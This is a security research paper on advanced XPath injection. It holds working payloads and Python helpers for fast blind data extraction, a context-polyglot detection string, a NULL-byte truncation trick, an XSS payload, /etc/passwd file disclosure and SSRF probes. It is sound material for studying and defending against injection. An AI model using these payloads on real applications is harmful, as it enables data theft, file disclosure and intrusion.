=======================================
	Modern XPath Exploitation
=======================================

Ruben Ventura Piña
http://nzt-48.org
@tr3w_
07-20-2023

Abstract
========

Now that XML documents are being widely used in modern web applications, XPath injections
are becoming more important.

With the introduction of XPath 2.0 and XPath 3.1, many new functions have been
added to XPath. These new functions allow attackers to perform more sophisticated and
powerful attacks than the exploitation techniques that are currently public.

At the time of writing, all XPath exploitation tools extract information
through very limited techniques such as brute force.

The purpose of this paper is to optimize the information extraction process as much as
possible and to present more damaging attacks: remote file disclosure, XSS,
turning blind injections into visible injections, and remote code execution.

An exploitation tool has been written as a proof of concept.

Bisection method
----------------

Instead of doing a brute-force attack, it is possible to use a binary search to make
the data extraction process much faster.

Before XPath 2.0, the binary search was performed using the contains() function. This means
that the full character set needs to be sent to the server. When dealing with non-Latin
scripts such as Japanese, this task becomes very tedious.

The new function 'string-to-codepoints' converts any character into its numeric Unicode
code point. The comparison operators "less than (<)" and "greater than (>)" can be combined
with 'string-to-codepoints' to run a binary search over the code point range and find each
character faster:

	1' and string-to-codepoints(substring(password/text(), 1, 1)) >= %d and
	string-to-codepoints(substring(password/text(), 1, 1)) < %d and '1
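
The search loop around that payload can be sketched in Python. This is a minimal sketch
under stated assumptions, not the code of any existing tool: the names make_payload,
extract_codepoint and simulated_oracle are hypothetical, and the oracle stands in for
"send the request and report whether the page answered TRUE".

```python
import re
from typing import Callable

def make_payload(position: int, low: int, high: int) -> str:
    """Build the range test for the character at a 1-based position."""
    target = f"string-to-codepoints(substring(password/text(), {position}, 1))"
    return f"1' and {target} >= {low} and {target} < {high} and '1"

def extract_codepoint(oracle: Callable[[str], bool], position: int,
                      low: int = 0, high: int = 0x110000) -> int:
    """Binary search for a code point known to lie in [low, high)."""
    while high - low > 1:
        mid = (low + high) // 2
        if oracle(make_payload(position, low, mid)):
            high = mid   # the code point is in the lower half
        else:
            low = mid    # the code point is in the upper half
    return low

def simulated_oracle(secret: str) -> Callable[[str], bool]:
    """Hypothetical stand-in for the vulnerable page (assumption for testing)."""
    pattern = re.compile(r"\(\), (\d+), 1\)\) >= (\d+) and .* < (\d+) and")
    def oracle(payload: str) -> bool:
        position, low, high = map(int, pattern.search(payload).groups())
        return low <= ord(secret[position - 1]) < high
    return oracle

def extract_string(oracle: Callable[[str], bool], length: int) -> str:
    """Extract `length` characters, one binary search per character."""
    return "".join(chr(extract_codepoint(oracle, i)) for i in range(1, length + 1))
```

Each character costs about 21 sequential requests over the full Unicode range; narrowing
the initial low and high bounds when the alphabet is known reduces that number.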

xcat is the only tool out there that uses this technique. A more advanced and optimized
technique has been designed (see the bitwise section).


Regexp method
-------------

New functions for performing regular expressions were also added to the language. It is
possible to use these functions as another way to implement the bisection method:

	1' and matches(substring(password/text(), 1, 1), "[A-Z]") and '1

Request after request, the character ranges will be split in half to narrow down the values
of the character being extracted.
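
The halving of character ranges can be sketched as follows. This is only an illustration
under assumptions: the candidate alphabet is restricted to ASCII letters and digits so
that no regex escaping is needed, the helper names are hypothetical, and the simulated
oracle replaces the real HTTP request.

```python
import re
import string
from typing import Callable

# Assumed alphabet, sorted by code point so halves compress into ranges.
ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase

def char_class(chars: str) -> str:
    """Compress sorted characters into a class such as [0-9A-F]."""
    parts, start, prev = [], chars[0], chars[0]
    for ch in chars[1:]:
        if ord(ch) != ord(prev) + 1:
            parts.append(start if start == prev else f"{start}-{prev}")
            start = ch
        prev = ch
    parts.append(start if start == prev else f"{start}-{prev}")
    return "[" + "".join(parts) + "]"

def make_payload(position: int, cls: str) -> str:
    return f"1' and matches(substring(password/text(), {position}, 1), \"{cls}\") and '1"

def extract_char(oracle: Callable[[str], bool], position: int) -> str:
    """Halve the candidate set until one character remains."""
    candidates = ALPHABET
    while len(candidates) > 1:
        half = candidates[: len(candidates) // 2]
        if oracle(make_payload(position, char_class(half))):
            candidates = half
        else:
            candidates = candidates[len(candidates) // 2:]
    return candidates

def simulated_oracle(secret: str) -> Callable[[str], bool]:
    """Hypothetical stand-in for the vulnerable page (assumption for testing)."""
    pattern = re.compile(r'\(\), (\d+), 1\), "(\[.*\])"\)')
    def oracle(payload: str) -> bool:
        position, cls = pattern.search(payload).groups()
        return re.search(cls, secret[int(position) - 1]) is not None
    return oracle
```

The sketch assumes the target character is inside the alphabet; a character outside it
would be reported as the last remaining candidate, so a final confirmation request is
advisable.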


Bitwise methods
---------------

In 2010, binary-based methods were invented to extract information through SQL injection
in an extremely optimized fashion. These methods extract characters in their numeric binary
representation, bit by bit. If the page responds with a TRUE response, it means that the bit
in question is a 1. In any other case, the bit being extracted is equal to 0.

The advantage of this method is that every request is independent of the others, in
contrast to the bisection method, in which the requests must be performed sequentially
because each one depends on the previous answer. All the requests for a character can
therefore be sent at once using threads, so the character is obtained around 7 times
faster than with the bisection method. The injection looks like the following:

	1'and(floor(string-to-codepoints(substring(password/text(),1,1))div %d)mod 2)and'1

Since XPath doesn't implement any bitwise operators yet, each individual bit is obtained
by dividing the code point by a power of 2 (0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40 for
7-bit ASCII), rounding the quotient down and taking the result modulo 2. In the table
below, "/" denotes integer division:


	(97 / 0x01 % 0x02)	= 1	TRUE
	(97 / 0x02 % 0x02)	= 0	FALSE
	(97 / 0x04 % 0x02)	= 0	FALSE
	(97 / 0x08 % 0x02)	= 0	FALSE
	(97 / 0x10 % 0x02)	= 0	FALSE
	(97 / 0x20 % 0x02)	= 1	TRUE
	(97 / 0x40 % 0x02)	= 1	TRUE
	(97 / 0x80 % 0x02)	= 0	FALSE
	
	01100001 = 97 = 'a'
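
The parallel extraction can be sketched in Python with a thread pool. This is a minimal
sketch, assuming 7-bit characters; the function names are hypothetical and the simulated
oracle replaces the real request to the vulnerable page.

```python
import re
from concurrent.futures import ThreadPoolExecutor
from typing import Callable

def make_payload(position: int, divisor: int) -> str:
    """Payload that is TRUE when the bit selected by `divisor` is set."""
    return ("1'and(floor(string-to-codepoints(substring(password/text(),"
            f"{position},1))div {divisor})mod 2)and'1")

def extract_char(oracle: Callable[[str], bool], position: int, bits: int = 7) -> str:
    """Request every bit of one character concurrently and reassemble it."""
    divisors = [1 << bit for bit in range(bits)]           # 0x01, 0x02, ... 0x40
    payloads = [make_payload(position, d) for d in divisors]
    with ThreadPoolExecutor(max_workers=bits) as pool:
        answers = list(pool.map(oracle, payloads))         # order is preserved
    return chr(sum(d for d, is_set in zip(divisors, answers) if is_set))

def simulated_oracle(secret: str) -> Callable[[str], bool]:
    """Hypothetical stand-in for the vulnerable page (assumption for testing)."""
    pattern = re.compile(r"\(\),(\d+),1\)\)div (\d+)\)mod 2")
    def oracle(payload: str) -> bool:
        position, divisor = map(int, pattern.search(payload).groups())
        return (ord(secret[position - 1]) // divisor) % 2 == 1
    return oracle
```

Raising the bits parameter covers code points above 127 at the cost of more requests per
character; the requests remain independent of each other.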


Detection phase optimization
============================

Blind XPath injections can happen in single quoted strings, double quoted strings and
numeric contexts.

Usually, 3 injections must be made to find out what the context of the vulnerable
parameter is.

	and '1'='1
	and "1"="1
	and 1

This can be improved by using a single polyglot vector that is valid in every possible
context. Instead of making 3 requests, just 1 is made, which cuts the number of detection
requests by about 66%.

	and 1 (: ' and " and '"!='!=":)

Comments in XPath need to be opened and closed with the (: :) delimiters.
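
To see why the vector stays well formed in each context, the following Python sketch
splits the resulting expression into string literals, comments and remaining code. It is
a toy scanner written for this illustration, not a real XPath parser, and the surrounding
queries (id=1, name='x', name="x") are hypothetical examples.

```python
from typing import List, Tuple

POLYGLOT = """ and 1 (: ' and " and '"!='!=":)"""

def tokenize(expr: str) -> List[Tuple[str, str]]:
    """Split into ('string' | 'comment' | 'code', text); raise if unterminated."""
    tokens, i = [], 0
    while i < len(expr):
        ch = expr[i]
        if ch in "'\"":
            end = expr.find(ch, i + 1)
            if end == -1:
                raise ValueError("unterminated string literal")
            tokens.append(("string", expr[i:end + 1]))
            i = end + 1
        elif expr.startswith("(:", i):
            end = expr.find(":)", i + 2)
            if end == -1:
                raise ValueError("unterminated comment")
            tokens.append(("comment", expr[i:end + 2]))
            i = end + 2
        else:
            j = i
            while j < len(expr) and expr[j] not in "'\"" and not expr.startswith("(:", j):
                j += 1
            tokens.append(("code", expr[i:j].strip()))
            i = j
    return [(kind, text) for kind, text in tokens if text]

def skeleton(expr: str) -> str:
    """Replace every string literal with S and drop comments."""
    parts = ["S" if kind == "string" else text
             for kind, text in tokenize(expr) if kind != "comment"]
    return " ".join(parts)

numeric = skeleton("id=1" + POLYGLOT)
single = skeleton("name='x" + POLYGLOT + "'")
double = skeleton('name="x' + POLYGLOT + '"')
```

In the numeric context the quotes fall inside the comment; in the two quoted contexts the
comment delimiters fall inside string literals and the remaining quotes pair up into a
string comparison.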


Turn XPath injections into Cross-Site Scripting
========================================================

Instead of returning nodes with XPath, it is also possible to return specific strings
defined by the user:

	//root/"this text will be printed"


Although an XPath injection can in principle change the query by injecting more code, in
practice this is rarely straightforward because the original query always leaves trailing
text after the injected value:

	//users/username[username/text()='admin']/"print this text" ']/password
								    -----------Invalid code

As you can see, the only way to inject arbitrary text and have it displayed
is to break out of the predicate by closing the quote and the bracket, and then
rewrite the rest of the query at will. However, the trailing text left after
the injection is a problem: it either yields invalid code or increases the
complexity of the injection.

In contrast to SQL, there are no single line comments such as -- and # to ignore
the trailing text.

However, I found an undocumented behavior that is useful for discarding the trailing
text: placing a NULL byte after the injection. The NULL byte terminates the query string,
so everything after it is ignored and the attacker controls the output:

	//users/username[username/text()='admin']/"<script>alert()</script>"%00']/password

If the application reflects the query result without encoding it, that line uses XPath
to deliver an XSS attack.


Implementation-dependent comments regarding the NULL byte string terminator
---------------------------------------------------------------------------

As this NULL byte behavior doesn't appear in the XPath specifications, it is very
likely that it works only in certain XPath implementations.

I tested it in the Saxon implementation by Saxonica (http://saxonica.com) but I have not
had the chance to test it in other implementations.

It would be interesting to find out whether the NULL byte terminator works in other XPath
implementations. If someone wants to contribute by testing the NULL byte in other
implementations, the help would be highly appreciated.

List of other XPath Implementations:
https://en.wikipedia.org/wiki/XPath#Implementations


Turning blind injections into visible injections
=================================================

Since there is trailing text after the injection point, the only way to extract nodes
other than the ones intended to be displayed has been through blind boolean
injections.

With the NULL byte trick, however, the entire query can be changed and any desired node
can be displayed: the attacker escapes from the predicate brackets, appends other
selectors, and ends with a NULL byte so that the rest of the original query is ignored
and replaced with whatever expression the attacker wants to evaluate:

	//username[username/text()='admin']/CreditCartNumber/text()%00']/original-query
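
A small Python sketch of how such a parameter value could be assembled and URL-encoded
follows. The helper names and the query template are hypothetical, and the truncation at
the NULL byte only models the behavior reported above for Saxon; other implementations
may reject the query instead.

```python
from urllib.parse import quote

# Assumed shape of the server-side query; {value} is the injectable parameter.
ORIGINAL_QUERY = "//username[username/text()='{value}']/original-query"

def visible_injection(value: str, step: str) -> str:
    """Close the quote and the predicate, append a path step, then a NULL byte."""
    return f"{value}']/{step}\x00"

def effective_query(parameter: str) -> str:
    """Model of the reported behavior: everything after the NULL byte is dropped."""
    return ORIGINAL_QUERY.format(value=parameter).split("\x00", 1)[0]

def url_encode(payload: str) -> str:
    """Percent-encode the payload so the NULL byte travels as %00."""
    return quote(payload, safe="")

payload = visible_injection("admin", "CreditCartNumber/text()")
```

Here effective_query(payload) shows the query the processor would evaluate if the
terminator works, and url_encode(payload) is the form to place in the request.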


Arbitrary file disclosure
=========================

XPath can also be exploited to disclose the contents of arbitrary files on the server.
This is achieved with the new unparsed-text() function. The blind injection can be turned
into a visible one by using the NULL byte trick to modify the query and discard the rest
of the original. Thus, the contents of the target file are revealed in a single response.

	//user[user/text()='break']/unparsed-text('/etc/passwd')%00']/trailing-characters

The unparsed-text() function reads the file and returns all of its contents as a string.

Sometimes (depending on the XPath implementation) static-base-uri() returns an empty
result, which means that relative URIs cannot be resolved and absolute paths must be used
instead; this can be an obstacle when the paths are unknown. The function base-uri() can
be used to print the location of the resource being queried:

	//user[user/text()='break']/base-uri()%00']

The document-uri() function can also be used for this.

If it is not possible to make the blind injection visible (with the NULL byte trick), the
content of the files on the server can be extracted character by character through the
bitwise extraction methods.

It is worth noting that at the time of writing, xcat (the most popular tool) had
recently been updated to include this functionality. However, when I tested it, the module
had a lot of bugs and did not work most of the time (at least on my computer).


Server-Side Request Forgery
===========================

It is also possible to force XPath to send requests to any server by passing an HTTP
URL to the doc(), doc-available(), unparsed-text() or unparsed-text-available()
functions. The vulnerable server makes the request itself, on the attacker's behalf.
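
As an illustration, boolean probes built on these functions could be generated as below.
This is a sketch under assumptions: the payload shape reuses the single-quoted boolean
context from the earlier sections, the helper names are hypothetical, and the host and
ports are placeholders. Whether the TRUE/FALSE answer is observable, and whether the
processor is allowed to fetch remote resources at all, depends on the target.

```python
from typing import Iterable, List

def ssrf_probe(url: str, text: bool = False) -> str:
    """Boolean injection that makes the server fetch `url`.

    doc-available() expects an XML resource; unparsed-text-available()
    accepts any text resource.
    """
    if "'" in url or '"' in url:
        raise ValueError("quotes in the URL would break the injected expression")
    function = "unparsed-text-available" if text else "doc-available"
    return f"1' and {function}('{url}') and '1"

def port_probes(host: str, ports: Iterable[int]) -> List[str]:
    """One probe per port of a host reachable only from the server (placeholder)."""
    return [ssrf_probe(f"http://{host}:{port}/", text=True) for port in ports]

probes = port_probes("10.0.0.5", [80, 8080])
```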

Proof-Of-Concept
================
An XPath exploitation tool which implements the bitwise bit-anding method has been written.
http://nzt-48.org/tools/


Appendix
========

You can find the XPath specifications here:
https://www.w3.org/TR/xpath-functions-31/


Links to other XPath injection tools (most of them are very old):

xcat
https://github.com/orf/xcat

xxxpwn
https://github.com/feakk/xxxpwn

xpath-blind-explorer
https://github.com/micsoftvn/xpath-blind-explorer

XMLCHOR
https://github.com/Harshal35/XMLCHOR/